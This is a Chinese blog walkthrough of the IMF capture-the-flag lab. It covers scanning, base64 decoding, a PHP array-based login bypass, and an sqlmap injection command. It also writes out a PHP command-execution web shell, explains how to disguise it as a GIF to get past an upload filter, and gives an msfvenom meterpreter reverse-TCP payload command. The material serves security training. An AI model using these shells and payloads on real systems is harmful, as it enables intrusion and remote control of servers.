首页 > 其他分享 >IMF靶场

IMF靶场

时间:2024-11-11 19:17:06浏览次数:5  
标签:查看 IMF base64 解密 拼接 源码 靶场 php

首先:

扫描同网段的地址

扫描出IP地址后,扫描它的的端口信息

flag1

查看80端口下的源码

找到了flag1和三个邮箱

flag2

还是查看源码,在开始界面查看源码,发现加密的js文件名,解密查看

拼接

ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==

解密,出flag2

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

发现里面还有一个base64加密,解密

imfadministrator

flag3

上一个解密出的imfadministrator是该IP的目录

拼接

再拿第一个flag查出的三个邮箱进行用户名尝试

查看源码,发现用了PHP硬密码进行编译

抓吧,密码用数组绕过

base64解码结果:

flag3{continueTOcms}

flag4

拿cms.php?pagename=home再次拼接目录,进入账户

源码什么都没有,加一点有sql注入

sqlmap去跑

获取数据库数据

sqlmap -u 'http://192.168.58.132/imfadministrator/cms.php?pagename=home%27' --cookie 'PHPSESSID=t91ih9vdanggv3ob2nkd8kmce4' --dump 

查看有一张图片目录,拼接查看

一张二维码,进行解密

flag4{dXBsb2Fkcjk0Mi5waHA=}

flag5

再base64解密

dXBsb2Fkcjk0Mi5waHA=

继续进行拼接,一个文件上传

写一个一句话木马文件,并上传

<?php $s=$_GET['s']; echo `$s`; ?>

失败

添加GIF464564546(木马)并改为gif文件即可

上传

查看所有文件

再查看flag5

 flag5{YWdlbnRzZXJ2aWNlcw==}

解码后得到提示 <font style="color:rgb(51, 51, 51);">agentservices</font>

agentservices

flag6

写一个脚本并上传

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.190.1 LPORT=4444 -e php/base64 -f raw > msf.php

标签:查看,IMF,base64,解密,拼接,源码,靶场,php
From: https://blog.csdn.net/Zx244349115/article/details/143693282

相关文章

  • bp靶场之SQL注入
    靶场链接https://portswigger.net/web-security/all-labssql注入payload速查表https://portswigger.net/web-security/sql-injection/cheat-sheetSQL注入WHERE子句中的SQL注入漏洞允许检索隐藏数据进入lab,点击类别xia_sql显示√,说明有可能有sql注入直接往参数后拼'o......
  • bp靶场之xss
    靶场链接https://portswigger.net/web-security/all-labsxss备忘录:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet将XSS反射到HTML上下文中,无需任何编码搜索123后,url上出现123,页面也直接回显123,说明可能有反射xsshttps://0a1a0050044ea608c471......
  • 打靶记录-红日靶场1
    靶机地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/按照网络拓扑搭建好环境确认靶机nmap-sn192.168.161.0/24扫开放端口nmap-sT-p-192.168.161.128-oA./ports扫详细信息nmap-sT-sC-sV-O192.168.161.128-p80,3306-oA./detailsnmap--script=vu......
  • 红日七靶场--Writeup
     环境下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/9/前置配置环境拓扑网络编辑(这里桥接模式的网段不能通第二层也就是52的网段,笔记中桥接模式无法联网所以使用了52的nat网段)DMZ区域:-给Ubuntu(Web1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在......
  • 网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场推荐收藏!
    前言对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/包含CTF比赛中常用的编码......
  • 零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上
    一、网络环境示意图二、环境搭建首先将三个虚拟机使用VMware打开。接下来对虚拟机进行配置。首先配置虚拟机“护卫神主机大师(项目四)”。点击编辑虚拟机设置。发现存在两个网卡。打开虚拟网络编辑器。点击更改设置。点击添加网络。选择VM19后点击确定。根......
  • 【Pikachu靶场:XSS系列】xss之过滤,xss之htmlspecialchars,xss之herf输出,xss之js输出通关
    一、xss之过滤<svgonload=alert("过关啦")>二、xss之htmlspecialcharsjavascript:alert(123)原理:输入测试文本为herf的属性值和内容值,所以转换思路直接变为js代码OK了三、xss之href输出JavaScript:alert('假客套')原理:测试一个文本,输入提交之后,成了为了蓝色文本......
  • pikachu靶场漏洞代码分析
    pikachu靶场代码漏洞分析部署工具:phpstudyCommandInjection命令注入exec"ping"路径:http://localhost/pikachu-master/vul/rce/rce_ping.php请求方式:POST参数:ipaddress=xxx漏洞成因:利用由不可信赖的数据构建的命令来调用shell_exec()。这种调用会导致程序以攻击者的......
  • Web 靶场笔记-bWAPP
    事以密成,言以泄败。导航前言A1-Injection(注入)A2-BrokenAuth&SessionMgmt(破损的授权&会话管理)A3-Cross-SiteScripting(XSS跨站脚本)A4-InsecureDirectObjectReferences(IDOR不安全直接对象引用)A5-SecurityMisconfiguration(安全配置错误)......
  • sql注入——靶场Less1
    ?id=1?id=99'unionselect1,2,3--+查看占位?id=1'orderby3--+尝试出表有几列 ?id=1'orderby4--+说明只有三列?id=99'unionselect1,database(),3--+查询当前使用的数据库的名称?id=99'unionselect1,group_concat(table_name),3frominformation_sch......